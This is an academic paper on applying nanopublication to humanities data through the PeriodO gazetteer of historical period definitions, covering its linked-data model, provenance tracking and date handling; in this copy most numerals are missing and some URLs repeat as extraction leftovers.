in fields where computation has been the key to the ability to ask new and broader questions, it should surely be the case that research results are published in such a way that they are able to be easily parsed, collected, and compared by computer programs and the researchers who use them. on the occasions when research data are released and shared, they are often distributed on their own, stripped of the context necessary to locate them within a broad research environment (the identity of the researchers, where and how this research was conducted, etc.). in this case, publishing practice has swung too far to the opposite extreme. in the service of creating and sharing discrete datasets, the published results have been stripped of their provenance and their position within the wider scholarly endeavor that culminated in their publication. this contextual information is crucial for researchers to determine the trustworthiness of the dataset and learn about the broader project of research from which they resulted. nanopublication offers a supplementary form of publishing alongside traditional narrative publications. a nanopublication consists of three parts, all representable by rdf graphs: golden and shaw ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://dx.doi.org/ . /peerj-cs. . an assertion (a small, unambiguous unit of information) . the provenance of that assertion (who made that assertion, where, when, etc.) . the provenance of the nanopublication itself (who formed or extracted the assertion, when, and by what method) the formal definitions of these parts are specified by an owl ontology (groth et al., ). by representing their research in nanopublications alongside their narrative reports, researchers can publish their data in such a way that the data remain within their human context while also being easily digested by computer programs. authors are encouraged to include the smallest possible unambiguous pieces of information as the assertions at the center of a nanopublication. in the bioscience context, these assertions could range from statements of causality, to measurements of gene expressions or gene-disease associations, to statistics about drug interactions. the scope and nature of appropriate units of nanopublication inevitably vary by discipline. multiple statements of identical or closely related facts can be connected with different sources of provenance, thereby potentially augmenting the ability of consumers to judge the quality of assertions. groth, gibson & velterop ( ) call the collection of nanopublications all referring to the same assertion “s-evidence,” and cite the potential benefits of the ability to automatically connect findings across research publications. several european repositories of bioinformatic data have begun to publish their con- tents as nanopublications, including the biosemantics group (http://www.biosemantics. org), nextprot (http://nextprot.org/), and disgenet (http://www.disgenet.org/web/ disgenet/v . ). these publications can be aggregated and connected in larger systems, such as the decentralized reputation system described by kuhn ( ). 
nanopublication in the humanities while the bioinformatics research community has enthusiastically adopted nanopub- lication, other disciplines have been slow to follow. gradmann ( ) suggested that specialized and stable terminologies, as well as sufficient funding to organize these terminologies in formal ontologies, may be prerequisites for the successful deployment of nanopublication. thus while he expects other scientific, technical, and medical disciplines to eventually embrace nanopublication, he is less sure that nanopublication will work for the humanities. historians, for example, use relatively little specialized terminology and pride themselves on their ability to use “ordinary language” to represent the past. even when humanities scholars use specialized theoretical language, their use of this language is often unstable, ambiguous, and highly contested. perhaps, then, a publishing technique that seeks to eliminate such ambiguity is ill-suited for these fields. a related obstacle to the adoption of nanopublication beyond the hard sciences has to do with differences in the role played by “facts.” researchers trained in the hard sciences understand their work to be cumulative: scientists “stand on the shoulders of giants” and build upon the work of earlier researchers. while scientists can in principle go back and recreate the experiments of their predecessors, in practice they do this only when the results golden and shaw ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . 
of those experiments have not been sufficiently established as facts. efficient cumulative research requires that, most of the time, they simply trust that the facts they inherit work as advertised. something like this process seems to be assumed by many proponents of nanopublications. for example, mons & velterop ( ) claim that a major goal of nanopublication is to "elevate" factual observations made by scientists into standardized packages that can be accumulated in databases, at least until they are proved wrong. these standardized packages can then be automatically or semi-automatically analyzed to produce new factual observations (or hypotheses about potential observations), and the cycle continues. yet as mink ( ) observed, not all forms of research and scholarship are aimed at producing "detachable conclusions" that can serve as the basis for a cumulative process of knowledge production. anticipating gradmann, mink argued that detachable conclusions are possible in science because—and only because—of its theoretical structure. the division of labor in research requires that concepts have a uniformity of meaning, and the methodological problem of definition therefore becomes central (mink, , ). mink contrasted science to the study of history, which, lacking both explicit methodology and uniform consensus on the meanings of its concepts, does not produce "detachable conclusions." but this does not mean that historical scholarship fails to produce knowledge, only that it is a separate and autonomous mode of understanding. the goal of most historical scholarship is not to establish conclusions by constructing an explanatory chain of inferences from evidence. rather the goal is to render what mink called a "synoptic judgment," an interpretive act in which the scholar comes to "see together" the disparate observable elements of some phenomena as a synthetic whole. the historian who judges the advent of printing to have constituted a "communications revolution" (eisenstein, ) has not made an inference from the available evidence but has constructed a particular interpretation of that evidence. to communicate her synoptic judgment to others, she cannot simply state her conclusions unambiguously and rely on her audience's theoretical understanding to make them meaningful; instead she must arrange and exhibit the evidence to help them "see together" what she saw. so is nanopublication a poor fit for fields of knowledge production that do not follow the model of cumulative science? we believe the answer is no. first of all, even mink did not argue that there were no facts in history, only that the significant conclusions drawn by historians do not typically take the form of factual statements. there are plenty of equivalents in history and the humanities to the databases of curated factual statements that exist in the sciences: prosopographical databases (bradley & short, ), digital historical gazetteers (elliott & gillies, ), not to mention the catalogs and indexes of bibliographical data that make humanities scholarship possible (buckland, ). some of these facts may be vague or uncertain, but as kuhn et al. ( ) observe, even knowledge that cannot be completely formally represented, including vague or uncertain scientific findings, can benefit from the nanopublication approach. we agree but would go further
first of all, even mink did not argue that there were no facts in history, only that the significant conclusions drawn by historians do not typically take the form of factual statements. there are plenty of equivalents in history and the humanities to the databases of curated factual statements that exist in the sciences: prosopographical databases (bradley & short, ), digital historical gazetteers (elliott & gillies, ), not to mention the catalogs and indexes of bibliographical data that make humanities scholarship possible (buckland, ). some of these facts may be vague or uncertain, but as kuhn et al. ( ) observe, even knowledge that cannot be completely formally represented, including vague or uncertain scientific findings, can benefit from the nanopublication approach. we agree but would go further to say that nanopublication is useful even for information that is neither testable nor falsifiable, exemplified by mink’s synoptic judgments. we have demonstrated the utility of nanopublications for describing synoptic judgments of historical periodization in the periodo period gazetteer, which we describe below.

the periodo period gazetteer

in their work, archaeologists and historians frequently refer to time periods, such as the “classical iberian period” or the “progressive era.” these time periods are shorthand representations of commonly referenced segments of time and space. while time periods might have commonly understood definitions, they are typically scattered throughout myriad publications and are treated as shared, assumed knowledge. this leads to difficulty and repeated effort when scholars want to visualize their data in space and over time, which requires mapping these discursive period labels to discrete spatiotemporal ranges (rabinowitz, ). to build the periodo gazetteer, we compiled thousands of definitions of time periods from published sources within the fields of archaeology, history, and art history. we mapped these time periods to a consistent data model and published them as linked open data (heath & bizer, ) so that future scholars would be able to link their uses of period terms to information about the provenance of those terms. a web-based faceted browsing interface allows scholars to find and compare period definitions (see fig. ), or software developers can use the periodo data directly in their own systems. the gazetteer is editable via http; contributors can submit proposed changes in the form of patches, and the periodo editors can accept or reject them. all proposed and accepted changes are stored, and each period definition has a history of changes in the form of patch submissions and approvals (shaw et al., ). to ease the process of creating patches that conform to the periodo data model, we developed an editing interface that runs in a standard web browser (see fig. ).

data model

periodo defines a “period definition” as a scholarly assertion about the name and spatiotemporal extent of a period. the core of a period definition consists of text quoted from the original source indicating the name of the period, its temporal range, and the geographic region to which it applies. multiple period definitions from the same source are grouped into a period collection. for example, the article “domestic architecture and social differences in north-eastern iberia during the iron age (c.
– bc)” includes the following sentence:

for the catalan area, the complete system with the four above-mentioned categories is not as clearly documented before the fourth century as it is during the classical iberian period ( – bc), although differences in the size of the sites, as well as the specialization of the functions of some settlements, can be already detected during the early iberian period ( – bc) (belarte, ).

this sentence contains two assertions defining period extents, so it is modeled in periodo as two period definitions. the first definition has the label “classical iberian period” and its start and end points are labeled as “ bc” and “ bc” respectively. the second definition has the label “early iberian period” and its start and end points are labeled as “ bc” and “ bc” respectively. the spatial extent of both definitions is labeled as “catalan area”. all of these labels are taken verbatim from the source text and should never change. because they come from the same source, these two period definitions are grouped into a period collection. the bibliographic metadata for the source article is associated with this period collection. (in the event that a source defines only a single period, then the period collection will be a singleton.)

belonging to the same period collection does not imply that period definitions compose a periodization. a periodization is a single coherent, continuous division of historical time, each part of which is labeled with a period term. a period collection, on the other hand, is simply a set of period definitions that share the same source. when the period definitions in a period collection do compose a periodization, this can be indicated through the addition of statements relating the period definitions to one another, e.g., as belonging to the same periodization and having a specific ordering.

because source languages, dating systems, and naming of geographical regions can vary widely, labels taken verbatim from source documents are insufficient for indexing and visualizing period definitions in a uniform way. thus the rest of the periodo data model consists of properties added by periodo curators to normalize the semantic content of these textual labels. first, all periods originally defined in a language other than english are given an alternate english-language label. when a period definition was originally defined in english, the alternate label may make minor changes for consistency. for example, belarte’s definition of the “classical iberian period” was given an alternate label of “classical iberian”, removing the word “period” for brevity and consistency with other definitions. next, the specification of temporal start and end points is standardized by adding iso lexical representations of proleptic gregorian calendar years: - for “ bc” and - for “ bc”. (proleptic refers to dates represented in some calendar system that refer to a time prior to that calendar’s creation; the gregorian calendar was adopted in , but most of our dates fall in years prior to that one.) finally, descriptions of spatial extent are normalized by adding references to “spatial things”, typically modern nation-states. in this case both definitions are linked to the spatial thing identified by http://dbpedia.org/resource/spain. the complete periodo representation in turtle of belarte’s collection of period definitions is given in fig. .
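as a rough illustration of the data model just described, the collection and its two definitions might be sketched as plain data along the following lines. the key names are simplified stand-ins rather than the actual periodo json-ld keys, and the year values are placeholders, since the quoted labels above are what the gazetteer records verbatim.

    # illustrative sketch only: simplified keys, placeholder values.
    belarte_collection = {
        "source": {"title": "domestic architecture and social differences in "
                            "north-eastern iberia during the iron age"},
        "definitions": [
            {
                # labels quoted verbatim from the source text; these never change
                "original_label": "classical iberian period",
                "start_label": "<start year> bc",
                "end_label": "<end year> bc",
                "spatial_label": "catalan area",
                # properties added by curators to normalize the labels
                "alternate_label": "classical iberian",
                "iso_start": "<iso lexical year>",
                "iso_end": "<iso lexical year>",
                "spatial_things": ["http://dbpedia.org/resource/Spain"],
            },
            {
                "original_label": "early iberian period",
                "start_label": "<start year> bc",
                "end_label": "<end year> bc",
                "spatial_label": "catalan area",
                "alternate_label": "early iberian",
                "iso_start": "<iso lexical year>",
                "iso_end": "<iso lexical year>",
                "spatial_things": ["http://dbpedia.org/resource/Spain"],
            },
        ],
    }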
turtle is a human-readable syntax for serializing rdf graphs (carothers & prud’hommeaux, ).

figure : turtle representation of a periodo period collection containing two period definitions originally published by belarte ( ).

periodo as linked data

we have taken pains to make it easy to work with the periodo dataset, particularly keeping in mind developers who do not use an rdf-based tool stack. the dataset is published as json, which is easily parsed using standard libraries in most programming environments including, of course, web browsers. but while json provides an easy and convenient way to work with the periodo dataset by itself, we knew that many users would want to combine it with the growing body of scholarly linked data being published on the web. most of our initial contributors of period definitions work in archaeology, a discipline that has several large, well-curated, interlinked, widely used and well-maintained linked data datasets (isaksen et al., ). thus, we take advantage of the recent w c recommendation of json-ld (sporny, kellogg & lanthaler, ) to make the periodo dataset available as linked data. by providing a json-ld context for the periodo dataset, we have made it usable within an rdf-based stack.

rdf vocabularies

the json-ld context maps relationships between periodo entities to terms from rdf vocabularies. of these, the most important is skos (hobbs & pan, ). the human-readable labels for a periodo definition are mapped to the skos preflabel and altlabel properties, implying that a periodo period definition can be interpreted as a skos concept. the relationship between a period definition and the period collection to which it belongs is mapped to the skos inscheme property, implying that a period collection is a skos conceptscheme. the relationship between a period collection and its source is mapped to the dcmi source term, and the various properties in the bibliographic description of the source are mapped to their own appropriate dcmi terms. finally, the relation between a period definition and its geographical extent is mapped to the dcmi spatial term.
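the mechanism can be sketched with a hypothetical json-ld context fragment; this is not the actual periodo context, and the left-hand keys are the same simplified stand-ins used in the sketch above.

    # hypothetical json-ld context fragment mapping simplified keys to the
    # vocabularies named above; the real periodo context differs in detail.
    context_fragment = {
        "skos": "http://www.w3.org/2004/02/skos/core#",
        "dcterms": "http://purl.org/dc/terms/",
        "original_label": "skos:prefLabel",   # a period definition is a skos concept
        "alternate_label": "skos:altLabel",
        "collection": "skos:inScheme",        # a period collection is a concept scheme
        "source": "dcterms:source",
        "spatial_things": "dcterms:spatial",
    }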
the relationships between a period definition and the start and end of its temporal extent are respectively mapped to the owl-time intervalstartedby and intervalfinishedby properties. this implies that a period definition, in addition to being a skos concept, is an owl-time properinterval (an interval of time having non-zero duration). importantly, it also implies that the start and end of a period definition’s temporal extent are themselves properintervals, not points or instants. this is important because the beginnings and endings of historical periods can never be precisely determined. in the example of the classical iberian period given above, both the beginning and the end of the period are interpreted as intervals with a duration of one year. interpreting period starts and ends as properintervals allows us to make a distinction between the intervals themselves and their descriptions: though the intervals themselves are not precisely specifiable, we can create pragmatic owl-time datetimedescriptions of them for the purposes of comparison and visualization.

the start and end of a period definition’s temporal extent are themselves intervals with their own starts and ends, so a temporal extent can be associated with a maximum of four values. this is interoperable with other proposed representations of fuzzy, imprecise, or uncertain temporal extents, such as the four start, stop, earliest, latest keys proposed for geojson-ld (gillies, ). in the current periodo data set these four properties only have (iso ) year values, because none of our sources specified endpoints at a more granular level than the year. however, we expect to have finer-grained values as we add periodizations of more recent history. at that point we will need to decide upon a unit of representation that makes it simple to compare intervals defined at different levels of granularity. adding complexity to time interval expressions will be possible without changing our underlying data model because of the flexibility of our current approach.

the start, latest start, earliest end, end approach enables us to represent the most common patterns for defining periods found in our sources. for example, a period defined as starting “ b.c. (± years)” and ending “about b.c.” can be represented with three values: − , − , and − . kauppinen et al. ( ) propose defining curves over intervals to represent fuzziness, imprecision, or uncertainty in order to maximize precision and recall with respect to temporal relevance judgments made by experts. we have chosen not to support these more complex representations at this time because we are focused primarily on representing periods as defined in textual sources. natural language is already a compact and easily indexable way to represent imprecision or uncertainty. rather than imposing an arbitrary mapping from natural language to parameterized curves, we prefer to maintain the original natural language terms used. however, if scholars begin defining periods with parameterized curves (which is certainly possible) then we will revisit this decision.
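a minimal sketch of this four-value scheme, using plain integer years in iso-style astronomical numbering for readability (the dataset itself stores iso lexical year strings, and the example values below are hypothetical):

    # four-part temporal extent: start, latest start, earliest end, end.
    # integer years in astronomical numbering (1 bc = 0, 2 bc = -1, ...).
    from dataclasses import dataclass
    from typing import Optional

    @dataclass
    class TemporalExtent:
        start: int                         # earliest possible start year
        end: int                           # latest possible end year
        latest_start: Optional[int] = None
        earliest_end: Optional[int] = None

        def overlaps(self, query_start: int, query_end: int) -> bool:
            # generous test for time-range queries: any year between the earliest
            # start and the latest end may fall within the queried span
            return self.start <= query_end and self.end >= query_start

    # hypothetical "700 b.c. (± 50 years)" to "about 500 b.c.": three distinct
    # values, with the earliest end left unspecified
    example = TemporalExtent(start=-749, end=-499, latest_start=-649)
    print(example.overlaps(-600, -550))    # True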
modeling provenance

to model the provenance of period assertions, we used the provenance ontology (mcguinness, lebo & sahoo, ). we record each change to the dataset (a patch) as a prov:activity. this activity has prov:startedattime and prov:endedattime values representing timestamps when the patch was sent and accepted, respectively. the activity additionally has two prov:used statements: one which refers to the specific version of the entire dataset to which the patch was applied (for example, http://n t.net/ark:/ /p d?version= ), and one referring to the patch itself as a prov:entity. the patch entity contains a url to the json-patch file which resulted in the change activity (nottingham & bryan, ). finally, the activity has prov:generated statements for each of the period collections and period assertions (implied to be of the type prov:entity) that were affected by the given patch. each of these affected entities has a prov:specializationof statement that refers to the permanent identifier for the period assertion or collection (with no particular version specified). if the affected entities are revisions of an existing entity, they have prov:wasrevisionof statements that refer to the version that they were descended from. we publish a changelog at http://n t.net/ark:/ /p h#changelog that represents the sequential list of prov:activity entities that created the current version of the dataset as an ordered rdf list. in this way, one can reconstruct the origin of each change to the dataset as a whole, or to individual period assertions.
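the shape of a single change record can be sketched as plain data; the property names follow the prov terms just mentioned, while the urls and timestamps are placeholders rather than actual periodo identifiers.

    # sketch of one patch recorded as a prov:Activity; all values are placeholders.
    change_activity = {
        "@type": "prov:Activity",
        "prov:startedAtTime": "<timestamp when the patch was submitted>",
        "prov:endedAtTime": "<timestamp when the patch was accepted>",
        "prov:used": [
            "<url of the dataset version the patch was applied to>",
            "<url of the json-patch document describing the change>",
        ],
        "prov:generated": [
            {
                "@id": "<url of the new version of an affected period definition>",
                "prov:specializationOf": "<permanent identifier of that definition>",
                "prov:wasRevisionOf": "<url of the previous version, if any>",
            },
        ],
    }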
minting long-term urls

in addition to mapping relationships to well-known vocabularies, interpreting periodo as linked data requires a way to assign urls to period collections and definitions. as shown in fig. , period definitions and period collections in the dataset are given short identifiers: p xc mvjx identifies the definition of the classical iberian period, and p xc m identifies the collection to which it belongs. but these identifiers are only useful within the context of the periodo dataset; they are not guaranteed to be unique in a global context and, unless one already has the periodo data, one cannot resolve them to obtain representations of the entities they identify. urls, on the other hand, are globally unique and can be resolved using http to obtain representations; this is the core concept behind linked data. so, we need a way to turn the short periodo identifiers into urls. to turn periodo identifiers into urls we rely on the ark identifier scheme (starr et al., ) provided by the california digital library (cdl).
first, we include in the json-ld context a @base value specifying the base uri (http://n t.net/ark:/ /p ) to use when interpreting the periodo dataset as linked data. this allows the short periodo identifiers to be interpreted as urls; for example, p xc mvjx is interpreted as a relative reference to the url http://n t.net/ark:/ /p xc mvjx . the hostname of this url (n t.net) is the registered name of the cdl’s name-to-thing resolver, which is similar to other name resolution services for persistent urls such as purl. we have registered with the ezid service a single ark identifier (ark:/ /p ), providing them with the url of the http server currently hosting the canonical periodo dataset. thus any request to a url starting with http://n t.net/ark:/ /p will be redirected to that server. an http get to http://n t.net/ark:/ /p d.jsonld will return the entire dataset, while getting (for example) http://n t.net/ark:/ /p xc mvjx .jsonld will return a json-ld representation of belarte’s definition of the “classical iberian period.”

period assertions as nanopublications

we created the periodo dataset based on the same core concerns of nanopublication authors: to extract, curate, and publish small, computable concepts from their broader sources while still preserving their provenance. a nanopublication is made up of an assertion, the provenance of that assertion, and the provenance of the nanopublication itself. in periodo, these are:

• assertion: the definition of a period.
• provenance: the source this period was derived from. this may be a citation of a printed work or a url for a resource hosted on the web.
• provenance of nanopublication: the history of the period definition within the periodo system, including the date it was added or changed, the identity of the person who submitted or changed it, and the identity of the person who approved additions or changes.

figure shows two period definitions with the same provenance. each of these definitions is represented by an individual nanopublication. the nanopublication for the “early iberian period” is shown in fig. .
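the correspondence can be sketched as three named parts; the values here are illustrative placeholders, not the actual graphs shown in the figure.

    # sketch of one period definition packaged as a nanopublication's three parts;
    # names and values are illustrative placeholders.
    nanopub = {
        "assertion": {
            # the period definition itself
            "original_label": "early iberian period",
            "alternate_label": "early iberian",
            "spatial_things": ["http://dbpedia.org/resource/Spain"],
        },
        "provenance": {
            # where the assertion came from: a citation or a url for the source
            "dcterms:source": "<citation of the belarte article>",
        },
        "publication_info": {
            # history of the definition within the periodo system
            "added_or_changed": "<date>",
            "submitted_by": "<contributor>",
            "approved_by": "<editor>",
        },
    }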
figure : nanopublication of belarte ( )’s definition of the “early iberian period”.

while periodo period definitions readily map to the nanopublication scheme, we faced several challenges during our creation of the dataset due to its interpretive nature.

the unfalsifiable nature of time period definitions

the current version of the nanopublication guidelines includes a note suggesting that the guidelines be amended to state that an assertion published as a nanopublication should be “a proposition that is falsifiable, that is to say we can test whether the proposition is true or false” (groth et al., ). were this amendment to be made, periodo nanopublications would be in violation of the guidelines, as period definitions in periodo, like most of the information produced in the humanities, are neither testable nor falsifiable. consider the assertion “there is a period called the late bronze age in northern europe, and it lasted from about b.c. to b.c.” the “late bronze age” is a purely discursive construct. there was no discrete entity called the “late bronze age” before it was named by those studying that time and place. consequently, one cannot disprove the idea that there was a time period called the “late bronze age” from around b.c. to b.c.; one can only argue that another definition has more credence based on non-experimental, discursive arguments.

the proposed falsifiability requirement makes sense in certain contexts. computational biologists, for example, wish to connect, consolidate, and assess trillions of measurements scattered throughout a rapidly growing body of research findings. their goal is to create a global, connected knowledge graph that can be used as a tool for scientists to guide new discoveries and verify experimental results.
in the periodo context, however, we are not concerned with making an exhaustive taxonomy of “correct” periods or facilitating the “discovery” of new periods (a non sequitur—there are no periods that exist in the world that are awaiting discovery by some inquiring historian or archaeologist). instead we are interested in enabling the study and citation of how and by whom time has been segmented into different periods. it is not necessary that these segmentations be falsifiable to achieve this goal; they only need to be comparable. kuhn et al. ( ) expressed concern that requiring formal representation for all scientific data published as nanopublications “seems to be unrealistic in many cases and might restrict the range of practical application considerably.” similarly, requiring assertions to be unambiguous and falsifiable would unnecessarily restrict the practical application of nanopublication. the nature of nanopublication assertions should ultimately be determined by the practical needs of the researchers who use them. what is important about nanopublications is not the nature of the assertions, but the expression of provenance. provenance is particularly important for non-scientific datasets, since the assertions made are so dependent on their wider discursive context. when assertions cannot be tested experimentally, understanding context is critical for judging quality, trustworthiness, and usefulness.

the critical role of curation

another difference between the periodo dataset and traditional nanopublications is the unavoidable curatorial work necessary to extract practically useful assertions from textual period definitions. in all of the applications of nanopublications we found, the published assertions typically appeared in the form of measurements or well-defined relationships between discrete entities. these are types of data which humans or computers can easily and reliably extract from research findings. our dataset, in contrast, required explicit curatorial decisions: a time period exists within a certain spatiotemporal context, and there is no sure way to discretely, accurately, and unambiguously model such boundaries. while a human might be able to have a nuanced understanding of temporary and ever-shifting political boundaries or the uncertain and partially arbitrary precision suggested by “around the beginning of the th century bc,” we cannot assume the same of computers. therefore, in order for our dataset to be readily algorithmically comparable, we had to map discursive concepts to discrete values. our curatorial decisions in this regard reflect a compromise between uniformity, potential semantic expressiveness, and practical usefulness.

as humanities scholars publish their own nanopublications (or linked data in general), they will go through similar curatorial processes due to the interpretive, unstandardized nature of humanities datasets discussed above. there is a temptation in this process to imagine perfect structured descriptions that could express all possible nuances of all possible assertions. however, chasing that goal can lead to overcomplexity and, in the end, be practically useless. in describing period assertions as linked data, we adopted a schema that was only as semantically complicated as was (a) expressed in our collected data and (b) necessitated by the practical needs of our intended users.
as we started to collect data, we considered the basic characteristics of a dataset that would be necessary to accomplish the retrieval and comparison tasks that our intended users told us were most important. these tasks included:

• finding how the definitions of periods have differed across time/authors, or finding contested period definitions. (“how have different authors defined the early bronze age?”)
• finding all periods within a certain span of time. (“what time periods have been used to describe years between ad and ad?”)
• finding all periods within a certain geographic area. (“what time periods have scholars used in northern europe?”)
• finding periods defined for different languages. (“what time periods have been defined in ukrainian?”)

figure shows how these various tasks can be completed using the faceted browsing interface to the periodo dataset.

figure : finding and comparing period definitions in periodo. searching for “early bronze” ( ) results in sixty period definitions with matching labels ( ), from a variety of sources ( ). the time range facet ( ) updates to show the distribution of temporal extents defined by these various sources. users can query for period definitions with temporal extents within a specific range of years using the time range facet ( ), period definitions with spatial extents within a named geographic area using the spatial coverage facet ( ), or period definitions in specific languages using the language facet ( ). queries may combine values from any of these facets.

implementing this interface required imposing consistency upon how we represented the temporal and spatial coverage of period definitions, even though this consistency does not exist in the original sources. our initial approach to imposing consistency on temporal extents was to express the termini of periods as julian days represented in scientific notation. julian days are a standard form of time measurement commonly used by astronomers to represent dates in the far historical past. julian days work by counting the number of continuous days that have passed since january , bc in the proleptic julian calendar. conceptually, this is a similar measurement to the common unix time standard, which counts the number of seconds that have passed since midnight gmt on january , . the idea is that by counting forward using well-defined units since an accepted epoch, one can escape the inconsistencies and periodic lapses that characterize different calendrical systems. representing julian days using scientific notation allows one to express variable levels of uncertainty. see examples of this notation system in table .

table : example scientific notation of julian days.
scientific notation | julian day (jdn)                   | proleptic gregorian
. e                 | between jdn , , and jdn , ,       | bc ± years
. e                 | between jdn , , and jdn , ,       | bc ± years
. e                 | between jdn , , and jdn , ,       | bc ± . years

however, in practice, we found this scheme to be overly complex. the imposition of a level of uncertainty, while theoretically useful in certain cases, was often not appropriate. in almost every single case that we observed, authors did not explicitly state a precise level of uncertainty for their temporal expressions. by adding precise uncertainty ourselves, we would, in effect, have been putting words in authors’ mouths.
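the way scientific notation encodes a level of uncertainty can be made concrete with a short sketch; the values are hypothetical, and this is the scheme we ultimately set aside.

    # fewer significant digits in the notation imply a wider range of julian day
    # numbers; the values here are hypothetical examples.
    from decimal import Decimal

    def jdn_range(notation: str) -> tuple:
        value = Decimal(notation)
        half_step = Decimal(1).scaleb(value.as_tuple().exponent) / 2
        return value - half_step, value + half_step

    print(jdn_range("1.53e6"))     # jdn 1,525,000 to 1,535,000 (± 5,000 days)
    print(jdn_range("1.534e6"))    # jdn 1,533,500 to 1,534,500 (± 500 days)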
further, julian days are not widely used outside of very specific disciplines, meaning that consumers of our data would have to convert to a more familiar time system before being able to understand or use our data. instead of the julian day model, we settled on the four-part iso date schema, described above. this model is less expressive for complicated forms of uncertainty, but it is less complex and more easily understood by both our target audience and typical software programs. iso dates were simple to convert to, since nearly all of the period assertions we observed were drawn from sources based on western calendars. if and when we encounter period definitions that require more complex time expressions or are based on varying calendrical systems, we will revisit the question of whether the four-part scheme is sufficient.

to encourage a consistent representation of temporal extent for all period definitions, we built a simple grammar and parser for date expressions that covered the vast majority of our sample data. the parser takes in a string like “c. mid- th century” and outputs a json string consistent with our data model. it can also produce naïve interpretations of descriptions like “mid-fifth century,” assigning them to the relevant third of the epoch described, according to the conventional segmentation into “early,” “mid,” and “late”: “mid-fifth century” would, then, be parsed as the range of years – . the parser is intended to be used interactively, as a generator of suggestions for standard ways to represent certain forms of time description. to keep the quality of the gazetteer high, we do not intend for the parser to be used to fully automatically “extract” period definitions from texts. similarly, we created an autocomplete interface to modern political entities to allow users to enter spatial coverage. these interface components help curators produce a practical approximation of spatiotemporal coverage rather than a complete, unambiguous representation. the interface we created to allow users to add and edit period definitions is shown in fig. .

figure : part of the interface for editing period definitions. labels for temporal extent boundaries are taken verbatim from the source, entered as free text, and automatically parsed into iso year representations. labels for spatial coverage are entered as free text, and using an autocompletion interface the user can specify the modern-day administrative units (e.g., nation-states) that approximate this spatial coverage.
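the kind of interactive suggestion the parser produces can be approximated with a toy sketch; this is not the periodo parser itself, and the segmentation boundaries and output keys are illustrative simplifications.

    # toy approximation of parsing "early/mid/late nth century [bc]" expressions
    # into a range of iso-style integer years; not the periodo parser.
    import re

    ORDINALS = {"first": 1, "second": 2, "third": 3, "fourth": 4, "fifth": 5,
                "sixth": 6, "seventh": 7, "eighth": 8, "ninth": 9, "tenth": 10}
    THIRDS = {"early": (0, 33), "mid": (33, 66), "late": (66, 100)}

    def parse_century_expression(text: str):
        m = re.match(r"(early|mid|late)-(\w+) century( bc)?$", text.strip().lower())
        if not m or m.group(2) not in ORDINALS:
            return None
        part, ordinal, bc = m.groups()
        century_start = (ORDINALS[ordinal] - 1) * 100 + 1   # fifth century -> 401
        lo_off, hi_off = THIRDS[part]
        lo, hi = century_start + lo_off, century_start + hi_off
        if bc:                                              # n bc maps to iso year 1 - n
            lo, hi = 1 - hi, 1 - lo
        return {"earliest_year": lo, "latest_year": hi}

    print(parse_century_expression("mid-fifth century"))
    # {'earliest_year': 434, 'latest_year': 467}
    print(parse_century_expression("mid-fifth century bc"))
    # {'earliest_year': -466, 'latest_year': -433}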
project status and future work

as of late , we have gathered just over , period definitions from sources, including monographs, journal articles, and online databases. each period has been assigned a permanent url, which can be resolved to view its definition and provenance as html, json-ld, or turtle. several projects have begun to use our gazetteer to add spatiotemporal information to their work, including the open context research data repository (http://opencontext.org), the ariadne archaeological research data infrastructure project (http://ariadne-infrastructure.eu), and the portable antiquities scheme database of archaeological finds in the uk (https://finds.org.uk).

as more projects begin to integrate periodo identifiers for time periods, we hope to gather information on their citation and use. this would include both studying the historical use of attributed period definitions as well as tracking the citation of periodo period identifiers going forward. such a study would allow us to observe how periods come into circulation and fall out of favor. tracing the connections fostered by use of our gazetteer would demonstrate the potential benefits of a linked data approach in the humanities.

we are also in the process of reaching out to period-defining communities beyond classical archaeology and ancient history. we expect that this will require some extensions of and revisions to the current periodo data model. first, as we begin to collect definitions of periods closer to the present, we expect to extend our model of temporal extent to allow for more fine-grained interval boundaries than years. this will require a unit of representation that allows comparisons between intervals defined at different levels of granularity. (the approach based on julian days, described in table , may be useful for this.) second, as we begin to include more non-western period definitions, we will need to ensure that we can still map years to iso representations.
at the very least, this will require extending the temporal expression parser, and it may require changes to the data model as well, for example to state explicitly the calendar system used by the original authors. finally, as more historians begin publishing their work as datasets or software, we may begin to encounter periods defined not in natural language but using some formalism, such as the curves proposed by kauppinen et al. ( ). these will require us to find a way of including such formalisms directly in our definitions.

conclusion

